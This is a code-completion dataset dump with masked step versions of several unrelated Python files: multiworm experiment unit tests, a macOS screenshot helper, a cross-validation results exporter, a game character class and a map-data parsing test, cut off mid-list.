"step-3": "<mask token>\n\n\nclass TestExperimentOpen(unittest.TestCase):\n\n def test_pathlib(self):\n ex = multiworm.Experiment(SYNTH1)\n <mask token>\n <mask token>\n\n def test_strroot_and_id(self):\n ex = multiworm.Experiment(data_root=str(DATA_DIR), experiment_id=\n 'synth1')\n\n def test_empty_fail(self):\n try:\n multiworm.Experiment()\n except Exception as e:\n if not isinstance(e, ValueError):\n self.fail('raised some unexpected error')\n if not all(x in str(e) for x in ['experiment_id', 'must',\n 'provided']):\n self.fail('error message unexpected')\n else:\n self.fail('experiment constructor worked with no arguments')\n\n def test_dataroot_only_fail(self):\n try:\n multiworm.Experiment(data_root=DATA_DIR)\n except Exception as e:\n if not isinstance(e, ValueError):\n self.fail('raised some unexpected error')\n if not all(x in str(e) for x in ['experiment_id', 'must',\n 'provided']):\n self.fail('error message unexpected')\n else:\n self.fail(\n 'experiment constructor allowed data-root only without erroring'\n )\n\n def test_custom_id(self):\n my_id = 'peterspeppers'\n ex = multiworm.Experiment(fullpath=SYNTH1, experiment_id=my_id)\n self.assertEquals(ex.id, my_id)\n\n def test_callback(self):\n\n\n class StateThing(object):\n\n def __init__(self):\n self.progress = -1\n\n def __call__(self, progress):\n assert progress >= self.progress\n self.progress = progress\n ex = multiworm.Experiment(SYNTH1, callback=StateThing())\n\n\nclass TestMalformedExperiments(unittest.TestCase):\n\n def test_nonexistent_folder(self):\n try:\n ex = multiworm.Experiment(DATA_DIR /\n 'guaranteedtohopefullynotbethere')\n except multiworm.core.MWTDataError:\n self.fail('Overly specific error raised')\n except IOError as e:\n self.assertIn('exist', str(e))\n else:\n self.fail(\"Didn't even mention the folder isn't there\")\n\n def test_check_is_dir(self):\n try:\n ex = multiworm.Experiment(SYNTH1 / 'test_blobsfile.png')\n except multiworm.core.MWTDataError:\n self.fail('Overly specific error raised')\n except IOError as e:\n self.assertIn('directory', str(e))\n else:\n self.fail(\"Didn't even mention the folder isn't there\")\n\n def test_missing_summary(self):\n try:\n ex = multiworm.Experiment(DATA_DIR / 'bad_empty')\n except multiworm.core.MWTDataError as e:\n pass\n else:\n self.fail(\"Didn't raise error despite no summary file\")\n\n def test_dupe_summary(self):\n try:\n ex = multiworm.Experiment(DATA_DIR / 'bad_twosummary')\n except multiworm.core.MWTSummaryError as e:\n pass\n else:\n self.fail(\"Didn't raise error with ambiguous summary file\")\n\n\nclass TestMalformedData(unittest.TestCase):\n\n def test_zero_frame(self):\n try:\n ex = multiworm.Experiment(DATA_DIR / 'bad_framezero')\n except multiworm.core.MWTDataError:\n pass\n else:\n self.fail(\"Didn't raise error on malformed data with a frame 0\")\n\n\nclass TestReadingData(unittest.TestCase):\n\n def setUp(self):\n self.ex = multiworm.Experiment(SYNTH1)\n\n def test_length_is_num_blobs(self):\n self.assertEqual(SYNTH1_N_BLOBS, len(self.ex))\n\n def test_iter(self):\n count = 0\n for thing in self.ex:\n count += 1\n self.assertEqual(SYNTH1_N_BLOBS, count)\n\n def test_iter_blobs(self):\n count = 0\n for thing in self.ex.blobs():\n count += 1\n self.assertEqual(SYNTH1_N_BLOBS, count)\n\n\nclass TestExperimentProperties(unittest.TestCase):\n\n def setUp(self):\n self.ex = multiworm.Experiment(SYNTH1)\n\n def test_blobs_in_frame(self):\n self.assertEquals(list(self.ex.blobs_in_frame(10)), list(range(1, 12)))\n 
self.assertEquals(list(self.ex.blobs_in_frame(200)), list(range(5, 12))\n )\n\n def test_locked_graph(self):\n try:\n self.ex.graph.add_node(123)\n except nx.NetworkXError as e:\n self.assertIn('frozen', str(e).lower())\n else:\n self.fail('experiment graph should be frozen/locked')\n\n def test_graph_copy_unlocked(self):\n G = self.ex.graph.copy()\n G.add_node(123)\n G.add_edge(55, 66)\n",
"step-4": "<mask token>\nTEST_ROOT = pathlib.Path(__file__).parent.resolve()\nDATA_DIR = TEST_ROOT / 'data'\nSYNTH1 = DATA_DIR / 'synth1'\nSYNTH1_N_BLOBS = 12\n\n\nclass TestExperimentOpen(unittest.TestCase):\n\n def test_pathlib(self):\n ex = multiworm.Experiment(SYNTH1)\n\n def test_strpath(self):\n ex = multiworm.Experiment(str(SYNTH1))\n\n def test_root_and_id(self):\n ex = multiworm.Experiment(data_root=DATA_DIR, experiment_id='synth1')\n\n def test_strroot_and_id(self):\n ex = multiworm.Experiment(data_root=str(DATA_DIR), experiment_id=\n 'synth1')\n\n def test_empty_fail(self):\n try:\n multiworm.Experiment()\n except Exception as e:\n if not isinstance(e, ValueError):\n self.fail('raised some unexpected error')\n if not all(x in str(e) for x in ['experiment_id', 'must',\n 'provided']):\n self.fail('error message unexpected')\n else:\n self.fail('experiment constructor worked with no arguments')\n\n def test_dataroot_only_fail(self):\n try:\n multiworm.Experiment(data_root=DATA_DIR)\n except Exception as e:\n if not isinstance(e, ValueError):\n self.fail('raised some unexpected error')\n if not all(x in str(e) for x in ['experiment_id', 'must',\n 'provided']):\n self.fail('error message unexpected')\n else:\n self.fail(\n 'experiment constructor allowed data-root only without erroring'\n )\n\n def test_custom_id(self):\n my_id = 'peterspeppers'\n ex = multiworm.Experiment(fullpath=SYNTH1, experiment_id=my_id)\n self.assertEquals(ex.id, my_id)\n\n def test_callback(self):\n\n\n class StateThing(object):\n\n def __init__(self):\n self.progress = -1\n\n def __call__(self, progress):\n assert progress >= self.progress\n self.progress = progress\n ex = multiworm.Experiment(SYNTH1, callback=StateThing())\n\n\nclass TestMalformedExperiments(unittest.TestCase):\n\n def test_nonexistent_folder(self):\n try:\n ex = multiworm.Experiment(DATA_DIR /\n 'guaranteedtohopefullynotbethere')\n except multiworm.core.MWTDataError:\n self.fail('Overly specific error raised')\n except IOError as e:\n self.assertIn('exist', str(e))\n else:\n self.fail(\"Didn't even mention the folder isn't there\")\n\n def test_check_is_dir(self):\n try:\n ex = multiworm.Experiment(SYNTH1 / 'test_blobsfile.png')\n except multiworm.core.MWTDataError:\n self.fail('Overly specific error raised')\n except IOError as e:\n self.assertIn('directory', str(e))\n else:\n self.fail(\"Didn't even mention the folder isn't there\")\n\n def test_missing_summary(self):\n try:\n ex = multiworm.Experiment(DATA_DIR / 'bad_empty')\n except multiworm.core.MWTDataError as e:\n pass\n else:\n self.fail(\"Didn't raise error despite no summary file\")\n\n def test_dupe_summary(self):\n try:\n ex = multiworm.Experiment(DATA_DIR / 'bad_twosummary')\n except multiworm.core.MWTSummaryError as e:\n pass\n else:\n self.fail(\"Didn't raise error with ambiguous summary file\")\n\n\nclass TestMalformedData(unittest.TestCase):\n\n def test_zero_frame(self):\n try:\n ex = multiworm.Experiment(DATA_DIR / 'bad_framezero')\n except multiworm.core.MWTDataError:\n pass\n else:\n self.fail(\"Didn't raise error on malformed data with a frame 0\")\n\n\nclass TestReadingData(unittest.TestCase):\n\n def setUp(self):\n self.ex = multiworm.Experiment(SYNTH1)\n\n def test_length_is_num_blobs(self):\n self.assertEqual(SYNTH1_N_BLOBS, len(self.ex))\n\n def test_iter(self):\n count = 0\n for thing in self.ex:\n count += 1\n self.assertEqual(SYNTH1_N_BLOBS, count)\n\n def test_iter_blobs(self):\n count = 0\n for thing in self.ex.blobs():\n count += 1\n 
self.assertEqual(SYNTH1_N_BLOBS, count)\n\n\nclass TestExperimentProperties(unittest.TestCase):\n\n def setUp(self):\n self.ex = multiworm.Experiment(SYNTH1)\n\n def test_blobs_in_frame(self):\n self.assertEquals(list(self.ex.blobs_in_frame(10)), list(range(1, 12)))\n self.assertEquals(list(self.ex.blobs_in_frame(200)), list(range(5, 12))\n )\n\n def test_locked_graph(self):\n try:\n self.ex.graph.add_node(123)\n except nx.NetworkXError as e:\n self.assertIn('frozen', str(e).lower())\n else:\n self.fail('experiment graph should be frozen/locked')\n\n def test_graph_copy_unlocked(self):\n G = self.ex.graph.copy()\n G.add_node(123)\n G.add_edge(55, 66)\n",
"step-5": "from __future__ import absolute_import, print_function, unicode_literals\nimport six\nfrom six.moves import zip, filter, map, reduce, input, range\n\nimport pathlib\nimport unittest\n\nimport networkx as nx\n\nimport multiworm\n\n\nTEST_ROOT = pathlib.Path(__file__).parent.resolve()\nDATA_DIR = TEST_ROOT / 'data'\nSYNTH1 = DATA_DIR / 'synth1'\n\nSYNTH1_N_BLOBS = 12\n\n\nclass TestExperimentOpen(unittest.TestCase):\n\n def test_pathlib(self):\n ex = multiworm.Experiment(SYNTH1)\n\n def test_strpath(self):\n ex = multiworm.Experiment(str(SYNTH1))\n\n def test_root_and_id(self):\n ex = multiworm.Experiment(\n data_root=DATA_DIR,\n experiment_id='synth1',\n )\n\n def test_strroot_and_id(self):\n ex = multiworm.Experiment(\n data_root=str(DATA_DIR),\n experiment_id='synth1',\n )\n\n def test_empty_fail(self):\n try:\n multiworm.Experiment()\n except Exception as e:\n if not isinstance(e, ValueError):\n self.fail('raised some unexpected error')\n if not all(x in str(e) for x in ['experiment_id', 'must', 'provided']):\n self.fail('error message unexpected')\n else:\n self.fail('experiment constructor worked with no arguments')\n\n def test_dataroot_only_fail(self):\n try:\n multiworm.Experiment(data_root=DATA_DIR)\n except Exception as e:\n if not isinstance(e, ValueError):\n self.fail('raised some unexpected error')\n if not all(x in str(e) for x in ['experiment_id', 'must', 'provided']):\n self.fail('error message unexpected')\n else:\n self.fail('experiment constructor allowed data-root only without erroring')\n\n def test_custom_id(self):\n my_id = 'peterspeppers'\n ex = multiworm.Experiment(fullpath=SYNTH1, experiment_id=my_id)\n self.assertEquals(ex.id, my_id)\n\n def test_callback(self):\n class StateThing(object):\n def __init__(self):\n self.progress = -1\n\n def __call__(self, progress):\n assert progress >= self.progress\n self.progress = progress\n\n ex = multiworm.Experiment(SYNTH1, callback=StateThing())\n\n\nclass TestMalformedExperiments(unittest.TestCase):\n\n def test_nonexistent_folder(self):\n try:\n ex = multiworm.Experiment(DATA_DIR / 'guaranteedtohopefullynotbethere')\n except multiworm.core.MWTDataError:\n self.fail('Overly specific error raised')\n except IOError as e:\n self.assertIn('exist', str(e))\n else:\n self.fail(\"Didn't even mention the folder isn't there\")\n\n def test_check_is_dir(self):\n try:\n ex = multiworm.Experiment(SYNTH1 / 'test_blobsfile.png')\n except multiworm.core.MWTDataError:\n self.fail('Overly specific error raised')\n except IOError as e:\n self.assertIn('directory', str(e))\n else:\n self.fail(\"Didn't even mention the folder isn't there\")\n\n def test_missing_summary(self):\n try:\n ex = multiworm.Experiment(DATA_DIR / 'bad_empty')\n except multiworm.core.MWTDataError as e:\n pass\n else:\n self.fail(\"Didn't raise error despite no summary file\")\n\n def test_dupe_summary(self):\n try:\n ex = multiworm.Experiment(DATA_DIR / 'bad_twosummary')\n except multiworm.core.MWTSummaryError as e:\n pass\n else:\n self.fail(\"Didn't raise error with ambiguous summary file\")\n\n\nclass TestMalformedData(unittest.TestCase):\n\n def test_zero_frame(self):\n try:\n ex = multiworm.Experiment(DATA_DIR / 'bad_framezero')\n except multiworm.core.MWTDataError:\n pass\n else:\n self.fail(\"Didn't raise error on malformed data with a frame 0\")\n\n\nclass TestReadingData(unittest.TestCase):\n\n def setUp(self):\n self.ex = multiworm.Experiment(SYNTH1)\n\n def test_length_is_num_blobs(self):\n self.assertEqual(SYNTH1_N_BLOBS, len(self.ex))\n\n def 
test_iter(self):\n count = 0\n for thing in self.ex:\n count += 1\n self.assertEqual(SYNTH1_N_BLOBS, count)\n\n def test_iter_blobs(self):\n count = 0\n for thing in self.ex.blobs():\n count += 1\n self.assertEqual(SYNTH1_N_BLOBS, count)\n\n\nclass TestExperimentProperties(unittest.TestCase):\n\n def setUp(self):\n self.ex = multiworm.Experiment(SYNTH1)\n\n def test_blobs_in_frame(self):\n self.assertEquals(list(self.ex.blobs_in_frame(10)), list(range(1, 12)))\n self.assertEquals(list(self.ex.blobs_in_frame(200)), list(range(5, 12)))\n\n def test_locked_graph(self):\n try:\n self.ex.graph.add_node(123)\n except nx.NetworkXError as e:\n self.assertIn('frozen', str(e).lower())\n else:\n self.fail('experiment graph should be frozen/locked')\n\n def test_graph_copy_unlocked(self):\n G = self.ex.graph.copy()\n G.add_node(123)\n G.add_edge(55, 66)\n",
"step-ids": [
18,
19,
24,
27,
29
]
}
|
[
18,
19,
24,
27,
29
] |
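The test suite in the record above depends on networkx's frozen-graph behaviour: mutating a frozen graph raises NetworkXError whose message mentions 'frozen', while .copy() hands back a mutable graph. A minimal standalone sketch of that contract, using only the public networkx API:

# Demonstrates the frozen-graph behaviour the tests exercise.
import networkx as nx

G = nx.Graph()
G.add_edge(1, 2)
nx.freeze(G)  # freezes in place; mutation now raises NetworkXError

try:
    G.add_node(123)
except nx.NetworkXError as err:
    assert 'frozen' in str(err).lower()

H = G.copy()  # copies are not frozen
H.add_node(123)
H.add_edge(55, 66)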
import os
def take_shot(filename):
os.system("screencapture "+filename+".png")
|
normal
|
{
"blob_id": "f4c90a6d6afdcf78ec6742b1924a5c854a5a4ed6",
"index": 1825,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef take_shot(filename):\n os.system('screencapture ' + filename + '.png')\n",
"step-3": "import os\n\n\ndef take_shot(filename):\n os.system('screencapture ' + filename + '.png')\n",
"step-4": "import os\n\ndef take_shot(filename):\n os.system(\"screencapture \"+filename+\".png\")\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
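take_shot in the record above concatenates the filename straight into an os.system string, so a crafted filename can inject shell commands, and screencapture only exists on macOS. A safer sketch under the same macOS assumption, passing an argument list so no shell parsing happens:

# Safer variant: an argument list bypasses the shell entirely, and
# check=True raises CalledProcessError if screencapture fails.
import subprocess


def take_shot(filename):
    subprocess.run(['screencapture', filename + '.png'], check=True)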
import os
from typing import Union, Tuple, List
import pandas as pd
from flags import FLAGS
from helpers import load_from_pickle, decode_class, sort_results_by_metric
ROOT = FLAGS.ROOT
RESULTS_FOLDER = FLAGS.RESULTS_FOLDER
FULL_PATH_TO_CHECKPOINTS = os.path.join(ROOT, RESULTS_FOLDER, "checkpoints")
def eval_results(time_stamps: Union[Tuple, List],
excel_file_path=os.path.join(FULL_PATH_TO_CHECKPOINTS, f"xVal_results.xlsx")):
with pd.ExcelWriter(excel_file_path, mode="w") as writer:
for ts in time_stamps:
print(f"Evaluating results for time stamp: {ts}")
full_results_dict_path = os.path.join(FULL_PATH_TO_CHECKPOINTS, f"full_result_dict_{ts}.p")
full_results_dict = load_from_pickle(full_results_dict_path)
for run_id, results_dict in full_results_dict.items():
only_eval_dict = {cur_xval: [decode_class(data[3]) for data in data_list]
for cur_xval, data_list in results_dict.items()}
# convert to pandas dataframe
df = pd.DataFrame(only_eval_dict)
df.to_csv(os.path.join(FULL_PATH_TO_CHECKPOINTS, f"xVal_results_{run_id}.csv"), index=False, header=False)
df.to_excel(writer, run_id)
if __name__ == '__main__':
time_stamps_to_eval = ["1616007514.9154973"]
eval_results(time_stamps_to_eval)
metric = "f1score"
score_path_list, _ = sort_results_by_metric(os.path.join(ROOT, RESULTS_FOLDER, "checkpoints"), metric)
print(f"{metric}: {[s for s, p in score_path_list]}")
|
normal
|
{
"blob_id": "5447bd3b08c22913ae50ee66ee81554d2357ef3e",
"index": 3991,
"step-1": "<mask token>\n\n\ndef eval_results(time_stamps: Union[Tuple, List], excel_file_path=os.path.\n join(FULL_PATH_TO_CHECKPOINTS, f'xVal_results.xlsx')):\n with pd.ExcelWriter(excel_file_path, mode='w') as writer:\n for ts in time_stamps:\n print(f'Evaluating results for time stamp: {ts}')\n full_results_dict_path = os.path.join(FULL_PATH_TO_CHECKPOINTS,\n f'full_result_dict_{ts}.p')\n full_results_dict = load_from_pickle(full_results_dict_path)\n for run_id, results_dict in full_results_dict.items():\n only_eval_dict = {cur_xval: [decode_class(data[3]) for data in\n data_list] for cur_xval, data_list in results_dict.items()}\n df = pd.DataFrame(only_eval_dict)\n df.to_csv(os.path.join(FULL_PATH_TO_CHECKPOINTS,\n f'xVal_results_{run_id}.csv'), index=False, header=False)\n df.to_excel(writer, run_id)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef eval_results(time_stamps: Union[Tuple, List], excel_file_path=os.path.\n join(FULL_PATH_TO_CHECKPOINTS, f'xVal_results.xlsx')):\n with pd.ExcelWriter(excel_file_path, mode='w') as writer:\n for ts in time_stamps:\n print(f'Evaluating results for time stamp: {ts}')\n full_results_dict_path = os.path.join(FULL_PATH_TO_CHECKPOINTS,\n f'full_result_dict_{ts}.p')\n full_results_dict = load_from_pickle(full_results_dict_path)\n for run_id, results_dict in full_results_dict.items():\n only_eval_dict = {cur_xval: [decode_class(data[3]) for data in\n data_list] for cur_xval, data_list in results_dict.items()}\n df = pd.DataFrame(only_eval_dict)\n df.to_csv(os.path.join(FULL_PATH_TO_CHECKPOINTS,\n f'xVal_results_{run_id}.csv'), index=False, header=False)\n df.to_excel(writer, run_id)\n\n\nif __name__ == '__main__':\n time_stamps_to_eval = ['1616007514.9154973']\n eval_results(time_stamps_to_eval)\n metric = 'f1score'\n score_path_list, _ = sort_results_by_metric(os.path.join(ROOT,\n RESULTS_FOLDER, 'checkpoints'), metric)\n print(f'{metric}: {[s for s, p in score_path_list]}')\n",
"step-3": "<mask token>\nROOT = FLAGS.ROOT\nRESULTS_FOLDER = FLAGS.RESULTS_FOLDER\nFULL_PATH_TO_CHECKPOINTS = os.path.join(ROOT, RESULTS_FOLDER, 'checkpoints')\n\n\ndef eval_results(time_stamps: Union[Tuple, List], excel_file_path=os.path.\n join(FULL_PATH_TO_CHECKPOINTS, f'xVal_results.xlsx')):\n with pd.ExcelWriter(excel_file_path, mode='w') as writer:\n for ts in time_stamps:\n print(f'Evaluating results for time stamp: {ts}')\n full_results_dict_path = os.path.join(FULL_PATH_TO_CHECKPOINTS,\n f'full_result_dict_{ts}.p')\n full_results_dict = load_from_pickle(full_results_dict_path)\n for run_id, results_dict in full_results_dict.items():\n only_eval_dict = {cur_xval: [decode_class(data[3]) for data in\n data_list] for cur_xval, data_list in results_dict.items()}\n df = pd.DataFrame(only_eval_dict)\n df.to_csv(os.path.join(FULL_PATH_TO_CHECKPOINTS,\n f'xVal_results_{run_id}.csv'), index=False, header=False)\n df.to_excel(writer, run_id)\n\n\nif __name__ == '__main__':\n time_stamps_to_eval = ['1616007514.9154973']\n eval_results(time_stamps_to_eval)\n metric = 'f1score'\n score_path_list, _ = sort_results_by_metric(os.path.join(ROOT,\n RESULTS_FOLDER, 'checkpoints'), metric)\n print(f'{metric}: {[s for s, p in score_path_list]}')\n",
"step-4": "import os\nfrom typing import Union, Tuple, List\nimport pandas as pd\nfrom flags import FLAGS\nfrom helpers import load_from_pickle, decode_class, sort_results_by_metric\nROOT = FLAGS.ROOT\nRESULTS_FOLDER = FLAGS.RESULTS_FOLDER\nFULL_PATH_TO_CHECKPOINTS = os.path.join(ROOT, RESULTS_FOLDER, 'checkpoints')\n\n\ndef eval_results(time_stamps: Union[Tuple, List], excel_file_path=os.path.\n join(FULL_PATH_TO_CHECKPOINTS, f'xVal_results.xlsx')):\n with pd.ExcelWriter(excel_file_path, mode='w') as writer:\n for ts in time_stamps:\n print(f'Evaluating results for time stamp: {ts}')\n full_results_dict_path = os.path.join(FULL_PATH_TO_CHECKPOINTS,\n f'full_result_dict_{ts}.p')\n full_results_dict = load_from_pickle(full_results_dict_path)\n for run_id, results_dict in full_results_dict.items():\n only_eval_dict = {cur_xval: [decode_class(data[3]) for data in\n data_list] for cur_xval, data_list in results_dict.items()}\n df = pd.DataFrame(only_eval_dict)\n df.to_csv(os.path.join(FULL_PATH_TO_CHECKPOINTS,\n f'xVal_results_{run_id}.csv'), index=False, header=False)\n df.to_excel(writer, run_id)\n\n\nif __name__ == '__main__':\n time_stamps_to_eval = ['1616007514.9154973']\n eval_results(time_stamps_to_eval)\n metric = 'f1score'\n score_path_list, _ = sort_results_by_metric(os.path.join(ROOT,\n RESULTS_FOLDER, 'checkpoints'), metric)\n print(f'{metric}: {[s for s, p in score_path_list]}')\n",
"step-5": "import os\nfrom typing import Union, Tuple, List\n\nimport pandas as pd\n\nfrom flags import FLAGS\nfrom helpers import load_from_pickle, decode_class, sort_results_by_metric\n\nROOT = FLAGS.ROOT\nRESULTS_FOLDER = FLAGS.RESULTS_FOLDER\n\nFULL_PATH_TO_CHECKPOINTS = os.path.join(ROOT, RESULTS_FOLDER, \"checkpoints\")\n\n\ndef eval_results(time_stamps: Union[Tuple, List],\n excel_file_path=os.path.join(FULL_PATH_TO_CHECKPOINTS, f\"xVal_results.xlsx\")):\n with pd.ExcelWriter(excel_file_path, mode=\"w\") as writer:\n for ts in time_stamps:\n print(f\"Evaluating results for time stamp: {ts}\")\n full_results_dict_path = os.path.join(FULL_PATH_TO_CHECKPOINTS, f\"full_result_dict_{ts}.p\")\n\n full_results_dict = load_from_pickle(full_results_dict_path)\n\n for run_id, results_dict in full_results_dict.items():\n only_eval_dict = {cur_xval: [decode_class(data[3]) for data in data_list]\n for cur_xval, data_list in results_dict.items()}\n # convert to pandas dataframe\n df = pd.DataFrame(only_eval_dict)\n df.to_csv(os.path.join(FULL_PATH_TO_CHECKPOINTS, f\"xVal_results_{run_id}.csv\"), index=False, header=False)\n df.to_excel(writer, run_id)\n\n\nif __name__ == '__main__':\n time_stamps_to_eval = [\"1616007514.9154973\"]\n eval_results(time_stamps_to_eval)\n\n metric = \"f1score\"\n\n score_path_list, _ = sort_results_by_metric(os.path.join(ROOT, RESULTS_FOLDER, \"checkpoints\"), metric)\n\n print(f\"{metric}: {[s for s, p in score_path_list]}\")\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
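The record above imports load_from_pickle, decode_class and sort_results_by_metric from a helpers module that is not included. A plausible stand-in for the simplest of them, assuming the checkpoint files are plain pickles (the real helper may differ):

# Hypothetical load_from_pickle -- the actual helpers module is not shown.
import pickle


def load_from_pickle(path):
    with open(path, 'rb') as fh:
        return pickle.load(fh)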
__author__ = 'Jager'
from char import Character
class Rouge (Character):
def special_attack1(self, opponent, hitdamage_callback, specatt_callback):
pass # hook method
def special_attack2(self, opponent, hitdamage_callback, specatt_callback):
pass # hook method
def heal(self, target):
pass # hook method
def regen_resource(self):
pass # hook method
def full_resource(self):
pass
|
normal
|
{
"blob_id": "36991c3191ba48b1b9dbd843e279f8fe124f1339",
"index": 73,
"step-1": "<mask token>\n\n\nclass Rouge(Character):\n\n def special_attack1(self, opponent, hitdamage_callback, specatt_callback):\n pass\n\n def special_attack2(self, opponent, hitdamage_callback, specatt_callback):\n pass\n <mask token>\n\n def regen_resource(self):\n pass\n\n def full_resource(self):\n pass\n",
"step-2": "<mask token>\n\n\nclass Rouge(Character):\n\n def special_attack1(self, opponent, hitdamage_callback, specatt_callback):\n pass\n\n def special_attack2(self, opponent, hitdamage_callback, specatt_callback):\n pass\n\n def heal(self, target):\n pass\n\n def regen_resource(self):\n pass\n\n def full_resource(self):\n pass\n",
"step-3": "__author__ = 'Jager'\n<mask token>\n\n\nclass Rouge(Character):\n\n def special_attack1(self, opponent, hitdamage_callback, specatt_callback):\n pass\n\n def special_attack2(self, opponent, hitdamage_callback, specatt_callback):\n pass\n\n def heal(self, target):\n pass\n\n def regen_resource(self):\n pass\n\n def full_resource(self):\n pass\n",
"step-4": "__author__ = 'Jager'\nfrom char import Character\n\n\nclass Rouge(Character):\n\n def special_attack1(self, opponent, hitdamage_callback, specatt_callback):\n pass\n\n def special_attack2(self, opponent, hitdamage_callback, specatt_callback):\n pass\n\n def heal(self, target):\n pass\n\n def regen_resource(self):\n pass\n\n def full_resource(self):\n pass\n",
"step-5": "__author__ = 'Jager'\nfrom char import Character\n\nclass Rouge (Character):\n\n def special_attack1(self, opponent, hitdamage_callback, specatt_callback):\n pass # hook method\n\n def special_attack2(self, opponent, hitdamage_callback, specatt_callback):\n pass # hook method\n\n def heal(self, target):\n pass # hook method\n\n def regen_resource(self):\n pass # hook method\n\n\n def full_resource(self):\n pass",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
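The record above is a template-method layout: Rouge overrides hook methods declared on a Character base class that the snippet never shows. A hypothetical sketch of how such a base class might drive those hooks:

# Hypothetical Character base class -- the real char module is not shown.
class Character:
    def take_turn(self, opponent, hitdamage_callback=None, specatt_callback=None):
        # Fixed skeleton: the flow lives here, subclasses fill in the steps.
        self.regen_resource()
        self.special_attack1(opponent, hitdamage_callback, specatt_callback)

    # Hooks with no-op defaults, overridden by subclasses such as Rouge.
    def special_attack1(self, opponent, hitdamage_callback, specatt_callback):
        pass

    def regen_resource(self):
        pass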
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def parse_mapdata_test():
current_folder = os.path.dirname(os.path.realpath(__file__))
misc_folder = os.path.join(current_folder, 'misc')
maplistdata_path = os.path.join(misc_folder, 'MapList.dat')
result = copy.parse_mapdata(maplistdata_path)
expected = {'num1': '00010001', 'num2': '00010001', 'regions': {(1): [
'BACK/B0000035.DFT', 'BACK/B0000036.DFT', 'BACK/B0000044.DFT',
'BACK/B0000045.DFT', 'BACK/B0000053.DFT', 'BACK/B0000054.DFT',
'NAME/N0000035.DFT', 'NAME/N0000036.DFT', 'NAME/N0000044.DFT',
'NAME/N0000045.DFT', 'NAME/N0000053.DFT', 'NAME/N0000054.DFT',
'POI/P0000035.DFT', 'POI/P0000036.DFT', 'POI/P0000044.DFT',
'POI/P0000045.DFT', 'POI/P0000053.DFT', 'POI/P0000054.DFT'], (2): [
'BACK/B0000024.DFT', 'BACK/B0000025.DFT', 'BACK/B0000026.DFT',
'BACK/B0000027.DFT', 'BACK/B0000033.DFT', 'BACK/B0000034.DFT',
'BACK/B0000035.DFT', 'BACK/B0000036.DFT', 'BACK/B0000042.DFT',
'BACK/B0000043.DFT', 'BACK/B0000044.DFT', 'BACK/B0000045.DFT',
'NAME/N0000024.DFT', 'NAME/N0000025.DFT', 'NAME/N0000026.DFT',
'NAME/N0000027.DFT', 'NAME/N0000033.DFT', 'NAME/N0000034.DFT',
'NAME/N0000035.DFT', 'NAME/N0000036.DFT', 'NAME/N0000042.DFT',
'NAME/N0000043.DFT', 'NAME/N0000044.DFT', 'NAME/N0000045.DFT',
'POI/P0000024.DFT', 'POI/P0000025.DFT', 'POI/P0000026.DFT',
'POI/P0000027.DFT', 'POI/P0000033.DFT', 'POI/P0000034.DFT',
'POI/P0000035.DFT', 'POI/P0000036.DFT', 'POI/P0000042.DFT',
'POI/P0000043.DFT', 'POI/P0000044.DFT', 'POI/P0000045.DFT'], (3): [
'BACK/B0000001.DFT', 'BACK/B0000008.DFT', 'BACK/B0000009.DFT',
'BACK/B0000010.DFT', 'BACK/B0000017.DFT', 'BACK/B0000018.DFT',
'BACK/B0000019.DFT', 'BACK/B0000026.DFT', 'BACK/B0000027.DFT',
'NAME/N0000001.DFT', 'NAME/N0000008.DFT', 'NAME/N0000009.DFT',
'NAME/N0000010.DFT', 'NAME/N0000017.DFT', 'NAME/N0000018.DFT',
'NAME/N0000019.DFT', 'NAME/N0000026.DFT', 'NAME/N0000027.DFT',
'POI/P0000017.DFT', 'POI/P0000018.DFT', 'POI/P0000019.DFT',
'POI/P0000026.DFT', 'POI/P0000027.DFT'], (4): ['BACK/B0000019.DFT',
'BACK/B0000020.DFT', 'BACK/B0000021.DFT', 'BACK/B0000022.DFT',
'BACK/B0000027.DFT', 'BACK/B0000028.DFT', 'BACK/B0000029.DFT',
'BACK/B0000030.DFT', 'BACK/B0000031.DFT', 'BACK/B0000036.DFT',
'BACK/B0000037.DFT', 'BACK/B0000038.DFT', 'BACK/B0000039.DFT',
'BACK/B0000040.DFT', 'BACK/B0000045.DFT', 'BACK/B0000046.DFT',
'BACK/B0000047.DFT', 'BACK/B0000048.DFT', 'BACK/B0000049.DFT',
'BACK/B0000054.DFT', 'NAME/N0000019.DFT', 'NAME/N0000020.DFT',
'NAME/N0000021.DFT', 'NAME/N0000022.DFT', 'NAME/N0000027.DFT',
'NAME/N0000028.DFT', 'NAME/N0000029.DFT', 'NAME/N0000030.DFT',
'NAME/N0000031.DFT', 'NAME/N0000036.DFT', 'NAME/N0000037.DFT',
'NAME/N0000038.DFT', 'NAME/N0000039.DFT', 'NAME/N0000040.DFT',
'NAME/N0000045.DFT', 'NAME/N0000046.DFT', 'NAME/N0000047.DFT',
'NAME/N0000048.DFT', 'NAME/N0000049.DFT', 'NAME/N0000054.DFT',
'POI/P0000019.DFT', 'POI/P0000020.DFT', 'POI/P0000021.DFT',
'POI/P0000022.DFT', 'POI/P0000027.DFT', 'POI/P0000028.DFT',
'POI/P0000029.DFT', 'POI/P0000030.DFT', 'POI/P0000031.DFT',
'POI/P0000036.DFT', 'POI/P0000037.DFT', 'POI/P0000038.DFT',
'POI/P0000039.DFT', 'POI/P0000040.DFT', 'POI/P0000045.DFT',
'POI/P0000046.DFT', 'POI/P0000047.DFT', 'POI/P0000048.DFT',
'POI/P0000049.DFT', 'POI/P0000054.DFT'], (5): ['BACK/B0000002.DFT',
'BACK/B0000003.DFT', 'BACK/B0000004.DFT', 'BACK/B0000011.DFT',
'BACK/B0000012.DFT', 'BACK/B0000013.DFT', 'BACK/B0000020.DFT',
'BACK/B0000021.DFT', 'BACK/B0000022.DFT', 'BACK/B0000029.DFT',
'BACK/B0000030.DFT', 'BACK/B0000031.DFT', 'NAME/N0000002.DFT',
'NAME/N0000003.DFT', 'NAME/N0000004.DFT', 'NAME/N0000011.DFT',
'NAME/N0000012.DFT', 'NAME/N0000013.DFT', 'NAME/N0000020.DFT',
'NAME/N0000021.DFT', 'NAME/N0000022.DFT', 'NAME/N0000029.DFT',
'NAME/N0000030.DFT', 'NAME/N0000031.DFT', 'POI/P0000003.DFT',
